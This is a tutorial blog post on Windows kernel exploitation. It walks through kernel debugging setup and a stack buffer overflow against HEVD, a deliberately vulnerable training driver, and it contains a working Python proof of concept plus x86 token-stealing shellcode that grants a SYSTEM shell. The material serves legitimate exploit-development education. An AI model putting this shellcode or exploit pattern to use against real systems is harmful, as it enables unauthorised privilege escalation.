This post will be the first of many in which I present you with a guide into the world of Windows Kernel Exploitation. As with anything in life, you must start somewhere and although we will be focusing on Windows 7 (x86) and Windows 10 (x64) for this post; we will ultimately be working our way up to Windows 11 (x64).

To get started, for this post you will need:

  • Virtualization Software: This can be anything from VirtualBox to VMWare. I will leave it up to you which virtualization software you decide to use.
  • WinDbg: This will serve as our debugger when working with the kernel, it’s important you download it from the Windows Driver Kit and NOT use WinDbg Preview for this series.
  • HEVD: For this tutorial series I will be using HEVD v3.00, at the time of writing this is the latest version. HEVD stands for Hack Sys Extreme Vulnerable Driver, and it will serve as our target for this series.
  • OSRLOADER: Since HEVD is a driver, we need a way to load it onto the operating system, to do this I will be using the OSRLOADER application.
  • Python: At the time of writing this, I was using version 3.11.5 however any version should be ok.
  • Ghidra: Ghidra will serve as our reverse engineering platform. If you have a copy of IDA Pro, you are more than welcome to adapt this series to use it :)
  • Sickle: This will be the payload development framework we will use for opcode generation as well as our token stealing shellcode. If you’re reading this in 2024 more than likely the new release is not out so you will have to use the latest branch NOT the latest release (aka just clone the repo).

It is important to note I have structured these guides for you to go from Exploit Developer to Kernel Exploit Developer. If you have never written a ROP chain or are completely unfamiliar with modern memory protections, I heavily recommend you start with Userland exploitation.

If you’re tight on cash and are looking for free resources I highly recommend the following:

  • Corelan Tutorials: Corelan was one of my biggest inspirations in making these blog posts. When I first started my journey into Exploit Development I read Corelan tutorials 1-11. I believe the content that is presented in them is still relevant to this day. Do not let the lack of modern operating systems used in this free series deter you. Concepts such as Egg Hunters work on Windows 11 just as well as they did for Windows XP.
  • Modern Binary Exploitation: This is a free course written by founders of RET2. With permission of the course authors, I have released my notes on my GitHub which you can use to follow along the slides. Once again, although this subject matter targets Linux x86 it is easily transferable to Windows.

If you currently work for an employer or are fortunate enough to choose your training I highly reccomend the following:

  • Corelan Training: Corelan offers updated training for the modern Windows environment so if you would prefer updated content his Expert Level Stack course should provide a solid foundation for Windows Exploit Development. I personally have taken his Heap Masterclass in 2019 and in the future I plan to attend again.
  • RET2 Wargames: RET2 Wargames is a course I took and completed in 2024 and I cannot emphasis enough how much it has impacted me. In addition, after completion I contacted the course authors, and they let me release my MBE notes free. If this is not enough to make you want to support them, I don’t know what is. I have also written an in-depth review, if you would like to learn more: >here<.

As of writing this post, I AM NOT sponsored by RET2 or Corelan. I truly believe in the course authors and if you do a little research, if you can’t now; in the future you will want to support them.

With that, we’re ready to get started!

Table of Contents

Kernel Debugging with WinDbg

When reading this tutorial, it’s important to recognize two definitions. Firstly, the computer that we will be working from is called the host computer or debugger machine. Whereas the computer that is being debugged, is called the target computer or debugee machine. We will be running our debugee as a virtual machine.

Configuring Target Computer (Debugee)

To begin, power on the debugee virtual machine and open an administrative command prompt and enter the following commands.

C:\Windows\system32>bcdedit /copy {current} /d "Kernel Debugging On"
The entry was successfully copied to {3709675a-4632-11ee-b00a-b3e46a698b2a}.

C:\Windows\system32>bcdedit /debug {3709675a-4632-11ee-b00a-b3e46a698b2a} on
The operation completed successfully.

The commands above will generate an entry in the boot table with debugging enabled. We can confirm this by running bcdedit on its own.

alt text

After creating the boot entry (now with debugging enabled), go ahead and launch the System Configuration app. Once opened navigate to the Boot tab. Select your newly added entry and hit Advanced Options.... Then copy the settings as shown below (I used COM2). It’s important the baud rate is synced with the host computer which we will configure to be 115200.

alt text

Hit OK, Apply, OK, then restart the Virtual Machine (VM).

Virtual Machine Settings

Power off the VM, then open VM settings and add a Serial Port. Once added use the settings as shown below:

alt text

Next time you boot in select the newly added entry as shown below; however we can now move onto the next step.

alt text

Configuring Host Computer (Debugger)

Assuming that the target computer was configured open the appropriate WinDbg in my case WinDbg (X64). Once opened select File then Kernel Debug....

alt text

Once selected a window will pop up, navigate to the COM tab and enter the following (as per your configuration).

alt text

Then hit OK. If you’ve not already done so boot into the target computer, and once we’ve loaded into the debugging entry, we previously added you should see the following.

alt text

You now have kernel debugging setup! Now… as an exercise, do this again on Windows 7.

Introduction to HEVD

By now you should have learned how to setup kernel debugging that said ensure that you have downloaded HEVD, OSRLOADER, and Python onto the target computer or debugee machine.

The first time you load HEVD you’re going to launch OSRLOADER.exe, be sure to run it as an administrator. You should see the following:

alt text

Once launched hit the Browse button and navigate to the appropriate HEVD driver and open it.

alt text

To ensure the driver is loaded on boot, go ahead and select Automatic from the drop down of the Service Start settings. Upon completion hit Register Service, then Start Service. You should see the following message:

alt text

Returning to our attached debugger, if you break and list the loaded modules you should see HEVD.

alt text

The next thing we’ll need to do is fix the symbols.

alt text

Take note of that path: C:\projects\hevd\build\driver\vulnerable\x86\HEVD\HEVD.pdb we’ll need to create it on the host computer, and we’ll need to copy all the files over like so:

alt text

Once done, reboot the machine. If everything went well this time you should see the following:

alt text

Working with Device Drivers

Device drivers are kernel mode objects so we cannot directly modify them from user mode. In order to interact with drivers, we need to obtain a HANDLE for them. To do this we need to use a symbolic link such as \\Driver and pass it into CreateFileA.

alt text

Once we’ve obtained a handle, we can use DeviceIoControl function to obtain a device input and output control (IOCTL) interface. This interface can send control codes to the device driver, each control code represents an operation for the driver to perform. For example, a control code can ask the device to carry out an action such as formatting a disk.

alt text

Let’s look at where we can find the information needed to perform these calls within HEVD.

Working with HEVD, Ghidra and WinDbg

So if we load the HEVD.sys file into ghidra we can see that the entry point of the driver really begins at DriverEntry(). This function is the first routine that is called when the driver is loaded and holds the responsibility of initializing the driver.

alt text

If we enter this function the picture becomes more clear.

alt text

Let’s take a look at this using WinDbg, to do so reboot the machine and set a breakpoint on the entrypoint before the driver is loaded. You should then hit the breakpoint.

alt text

If you continue to unassemble from here (u command) you should eventually see the call to IoCreateSymbolicLink. This function will create the symbolic link we can call upon from user-mode.

alt text

If we print the first argument, we can see the name of the symbolic link is going to be HackSysExtremeVulnerableDriver.

alt text

We can ignore \\DosDevices as this is a special namespace that Windows uses for the device driver. To interact with it we’ll be using \\.\HackSysExtremeVulnerableDriver, we use \\.\ since this the “Win32 device namespace” or “raw device namespace” that we can use from userland. Although we did not need to step though this, I wanted to see what arguments would be passed into the function when creating the Symbolic Link.

So how do we send data to HEVD? As prevously mentioned, we’re going to be using DeviceIoControl. As a recap, below is the parameters used by the function.

alt text

The main thing we want to focus on is the dwIoControlCode parameter. This will be the “command” that we want the driver to execute. These “commands” or requests are sent to the device via I/O request packets also known as IRPs.

Looking back at the Ghidra decompilation on line 31 we see that param_1->MajorFunction[0xe] is set to IrpDeviceIoCtlHandler. Why? If we look at MSDN we see the following structure definition for this particular object (__DRIVER_OBJECT).

alt text

Setting this indicates IrpDeviceIoCtlHandler will be the “function” that controls how the device can be interacted with. We know this based on the IRP Major Function Code 0xE as shown below (this is the index Windows will check for, currently I’m looking at this as the “main” function).

alt text

If we double click on IrpDeviceIoCtlHandler within Ghidra we’re presented with a decompilation of this function. Here we can see that HEVD uses a switch statement to handle our I/O requests.

alt text

With that we have everything needed to get started with Exploit Development.

Stack Overflow (Windows 7 - x86)

To ease into things why not start with a traditional buffer overflow. To further ease you into this I will also be using python. However, keep in mind that further into this series we will be using C and potentially C++.

Identifying the Vulnerability

Since we have symbols “reverse engineering” will be straight forward. Within the IrpDeviceIoCtlHandler we can see the stack buffer overflow can be triggered using the I/O control code 0x222003.

alt text

If we enter the function BufferOverflowStackIoctlHandler.

alt text

We ultimately make a call to TriggerBufferOverflowStack.

alt text

Let’s make a proof of concept (PoC) to see what happens when we enter this function, for this tutorial we will be using python.

import struct
import os
from ctypes import *

GENERIC_READ          = 0x80000000
GENERIC_WRITE         = 0x40000000
OPEN_EXISTING         = 0x00000003
FILE_ATTRIBUTE_NORMAL = 0x00000080

NULL = None

def main():

  kernel32 = windll.kernel32
  hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL)
  if (hHEVD == -1):
    print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n")
    exit(-1)

  buffer = "wetw0rk"

  print("[*] Calling control code 0x222003")
  kernel32.DeviceIoControl(hHEVD,
                           0x222003,
                           buffer,
                           len(buffer),
                           NULL,
                           0x00,
                           byref(c_ulong()),
                           NULL)

main()

Understanding BufferOverflowStackIoctlHandler

Let’s set a breakpoint on BufferOverflowStackIoctlHandler.

alt text

Let’s try to see exactly what is passed into this function, we can start by dumping the stack frame.

alt text

Looking at BufferOverflowStackIoctlHandler within Ghidra tells us these parameters are of type _IRP and _IO_STACK_LOCATION (we also previously saw this from the current stack frame in WinDbg)

alt text

However, we’re only really using param_2 of type _IO_STACK_LOCATION. We can find this structure layout using the MS Documentation however, since it’s rather large I’ll only show the relevant portion below.

typedef struct _IO_STACK_LOCATION {
  UCHAR                  MajorFunction;
  UCHAR                  MinorFunction;
  UCHAR                  Flags;
  UCHAR                  Control;
  union {
...
    struct {
      ULONG                   OutputBufferLength;
      ULONG POINTER_ALIGNMENT InputBufferLength;
      ULONG POINTER_ALIGNMENT FsControlCode;
      PVOID                   Type3InputBuffer;
    } FileSystemControl;
...
  } Parameters;
  PDEVICE_OBJECT         DeviceObject;
  PFILE_OBJECT           FileObject;
  PIO_COMPLETION_ROUTINE CompletionRoutine;
  PVOID                  Context;
} IO_STACK_LOCATION, *PIO_STACK_LOCATION;

If we dump this in WinDbg we can see that (param_2->Parameters).FileSystemControl.Type3InputBuffer is the pointer to our buffer.

alt text

So, when we enter TriggerBufferOverflowStack we rest assured that our input is being passed as param_1.

Understanding TriggerBufferOverflowStack

Now that we understood param_1 of TriggerBufferOverflowStack is infact our buffer exploitation seems rather easy.

alt text

All we need to do is send over 2060 bytes and we should have memory corruption! Let’s update the PoC and send it!

import struct
import os
from ctypes import *

GENERIC_READ          = 0x80000000
GENERIC_WRITE         = 0x40000000
OPEN_EXISTING         = 0x00000003
FILE_ATTRIBUTE_NORMAL = 0x00000080

NULL = None

def main():

  kernel32 = windll.kernel32
  hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL)
  if (hHEVD == -1):
    print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n")
    exit(-1)

  buffer = b"A" * 3000

  print("[*] Calling control code 0x222003")
  kernel32.DeviceIoControl(hHEVD,
                           0x222003,
                           buffer,
                           len(buffer),
                           NULL,
                           0x00,
                           byref(c_ulong()),
                           NULL)

main()

Once sent, we can see we have successfully overwritten the return address and we have gained control over the instruction pointer.

alt text

Kernel Shellcode??

So, we got control over the instruction pointer, and we have a solid understanding of how. The question remains, how do we get code execution, or rather spawn a SYSTEM shell?

We’re gonna need shellcode, however we can’t just use any shellcode. Since we’re running under the context of the kernel one wrong move directly correlates to a blue screen of death (BSOD). To reach our goal, we’re going to be using a technique known as Token Stealing. Using this technique, we’ll be copying a token with SYSTEM privileges to our current process.

Luckily for us HEVD comes with a few Payloads including this one. Let’s take a look at it within Payloads.c.

186 VOID TokenStealingPayloadWin7Generic() {
187     // No Need of Kernel Recovery as we are not corrupting anything
188     __asm {
189         pushad                               ; Save registers state
190         
191         ; Start of Token Stealing Stub       
192         xor eax, eax                         ; Set ZERO
193         mov eax, fs:[eax + KTHREAD_OFFSET]   ; Get nt!_KPCR.PcrbData.CurrentThread
194                                              ; _KTHREAD is located at FS:[0x124]
195         
196         mov eax, [eax + EPROCESS_OFFSET]     ; Get nt!_KTHREAD.ApcState.Process
197         
198         mov ecx, eax                         ; Copy current process _EPROCESS structure
199         
200         mov edx, SYSTEM_PID                  ; WIN 7 SP1 SYSTEM process PID = 0x4
201         
202         SearchSystemPID:
203             mov eax, [eax + FLINK_OFFSET]    ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
204             sub eax, FLINK_OFFSET
205             cmp [eax + PID_OFFSET], edx      ; Get nt!_EPROCESS.UniqueProcessId
206             jne SearchSystemPID
207         
208         mov edx, [eax + TOKEN_OFFSET]        ; Get SYSTEM process nt!_EPROCESS.Token
209         mov [ecx + TOKEN_OFFSET], edx        ; Replace target process nt!_EPROCESS.Token
210                                              ; with SYSTEM process nt!_EPROCESS.Token
211         ; End of Token Stealing Stub
212         
213         popad                                ; Restore registers state
214     }
215 }

Let’s break this down line by line. On line 193 we clear out the EAX register. Next on line 193 we use the FS register to get the address of the current thread located at offset 0x124. We can see this within WinDbg.

alt text

Let’s map out the structure, first we need the base address of the PCR (Processor Control Region), also known as the _KPCR from there we can easily traverse the structure and find the current thread.

alt text

Next, we need to find the address of the _EPROCESS data structure (“Executive Process”). Each running process on a Windows system is associated with an EPROCESS structure. We can do this just like we did the _KCPR.

alt text

Now let’s look at the next block of code within this Payload (Feel free to just follow along. At this point I began writing the shellcode stub):

         SearchSystemPID:
             mov eax, [eax + FLINK_OFFSET]    ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
             sub eax, FLINK_OFFSET
             cmp [eax + PID_OFFSET], edx      ; Get nt!_EPROCESS.UniqueProcessId
             jne SearchSystemPID

Here we’re extracting the forward link (FLINK) pointer from the current _EPROCESS structure, then subtracting the offset to the FLINK from EAX to have EAX then point to the next _EPROCESS structure in the linked list. We then compare the process ID of the _EPROCESS structure to 0x04 and if it’s not found we continue searching until we find a SYSTEM process.

Once we find a process, we simply replace the current processes token. This is almost like an egghunter but for tokens.

         mov edx, [eax + TOKEN_OFFSET]        ; Get SYSTEM process nt!_EPROCESS.Token
         mov [ecx + TOKEN_OFFSET], edx        ; Replace target process nt!_EPROCESS.Token
                                              ; with SYSTEM process nt!_EPROCESS.Token

The full code can be seen below:

[BITS 32      ]
[SECTION .text]

global _start

_start:

	pushad
	xor eax, eax                      ; set ZERO
	mov eax, dword fs:[eax+0x124]     ; nt!_KPCR.PcrbData.CurrentThread
	mov eax, [eax + 0x50]             ; nt!_KTHREAD.ApcState.Process
	mov ecx, eax                      ; Copy current process _EPROCESS structure
	mov edx, 0x04                     ; WIN 10 SYSTEM PROCESS PID

	SearchSystemPID:
		mov eax, [eax + 0xb8]         ; nt!_EPROCESS.ActiveProcessLinks.Flink
		sub eax, 0xb8
		cmp [eax + 0xb4], edx         ; nt!_EPROCESS.UniqueProcessId
		jne SearchSystemPID

	mov edx, [eax + 0xf8]             ; Get SYSTEM process nt!_EPROCESS.Token
	mov [ecx + 0xf8], edx             ; Replace target process nt!_EPROCESS.Token
	popad

Let’s look at this in the debugger, you can generate the shellcode using Sickle.

$ python3 sickle.py -p windows/x86/kernel_token_stealer -f python3 -v shellcode
# Bytecode generated by Sickle, size: 52 bytes
shellcode = bytearray()
shellcode += b'\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89'
shellcode += b'\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8'
shellcode += b'\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8'
shellcode += b'\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61'

Now let’s update the PoC as shown below:

import struct
import os
from ctypes import *

GENERIC_READ           = 0x80000000
GENERIC_WRITE          = 0x40000000
OPEN_EXISTING          = 0x00000003
FILE_ATTRIBUTE_NORMAL  = 0x00000080
MEM_COMMIT             = 0x00001000
MEM_RESERVE            = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040

NULL = None

def main():

  kernel32 = windll.kernel32
  hHEVD = kernel32.CreateFileA(b"\\\\.\\HackSysExtremeVulnerableDriver",
                               (GENERIC_READ | GENERIC_WRITE),
                               0x00,
                               NULL,
                               OPEN_EXISTING,
                               FILE_ATTRIBUTE_NORMAL,
                               NULL)
  if (hHEVD == -1):
    print("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n")
    exit(-1)

  # python3 sickle.py -p windows/x86/kernel_token_stealer -f python3 -v shellcode
  # Bytecode generated by Sickle, size: 52 bytes
  shellcode = bytearray()
  shellcode += b'\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1'
  shellcode += b'\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00'
  shellcode += b'\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00'
  shellcode += b'\x89\x91\xf8\x00\x00\x00\x61'

  print("[*] Allocating RWX memory")
  ptrMemory = kernel32.VirtualAlloc(NULL,
                                    len(shellcode),
                                    (MEM_COMMIT | MEM_RESERVE),
                                    PAGE_EXECUTE_READWRITE)

  print("[*] Creating a char array to house shellcode")
  buffer = (c_char * len(shellcode)).from_buffer(shellcode)

  print("[*] Copying shellcode array into RWX memory")
  kernel32.RtlMoveMemory(c_int(ptrMemory), buffer, len(shellcode))

  ptrShellcode = struct.pack("<L", ptrMemory)

  buffer  = b"A" * 2080
  buffer += ptrShellcode

  print("[*] Calling control code 0x222003")
  kernel32.DeviceIoControl(hHEVD,
                           0x222003,
                           buffer,
                           len(buffer),
                           NULL,
                           0x00,
                           byref(c_ulong()),
                           NULL)

  os.system("cmd.exe")

main()

Since we’re gonna be overwriting the return address, let’s break at BASE+OFFSET. We can get this from Ghidra.

alt text

Now let’s apply this to WinDbg.

alt text

With the breakpoint set, let’s launch our exploit on the target machine. Once the breakpoint is hit, we can see that we’re about to return the allocated memory region and execute our shellcode (52 bytes).

alt text

Let’s step into this (t) until we hit mov edx, 0x04. Once here ECX and EAX should contain pointers to _EPROCESS.

alt text

The next instruction moves the FLINK pointer into EAX.

alt text

Once done sub eax, 0xb8 executes (since we’re traversing active processes). This effectively positions eax to the start of the next _EPROCESS structure.

alt text

Let’s set a breakpoint here and continue execution until the process _EPROCESS.UniqueProcessId is 0x04 (I did it raw so if we reboot it likely won’t resolve). Once found we can see that the jump won’t be executed!

alt text

Now the code simply copies the token into our current _EPROCESS structure! It appears I was wrong in the last couple of notes this can be found in the owning process!

alt text

So, the reality is we don’t need to look too far once we have the current thread… I was confused but it makes total sense now. Below is screenshot to recap!

alt text

Now we can continue to execute our shellcode, but we get a segfault. Why?

alt text

Fixing The Crash

Looking at the state of registers it appears EBP is still corrupted. However more importantly we never return, let’s add a ret instruction to the shellcode and place a valid address into EBP and try again.

┌──(wetw0rk㉿kali)-[/opt/Sickle/src]
└─$ python3 sickle.py -a x86 -m asm_shell -f c                                            
[*] ASM Shell loaded for x86 architecture

sickle > a pop ebp
"\x5d" // pop ebp
sickle > a ret
"\xc3" // ret

Once we update the PoC and send it, we still get a segfault. So, I decided to look at Ghidra and you can see that the ret operations is RET 0x8. Let’s try it!

alt text

Once sent, we have SYSTEM!

alt text

Sources

https://www.welivesecurity.com/2017/03/27/configure-windbg-kernel-debugging/
https://microsoft.public.windbg.narkive.com/MamhR9YH/win7-and-kpcr
https://github.com/LordNoteworthy/windows-internals/blob/master/IRP%20Major%20Functions%20List.md
https://youtu.be/Ca3dAXDdoz8?si=oN_DsgyLz-Z4fVYL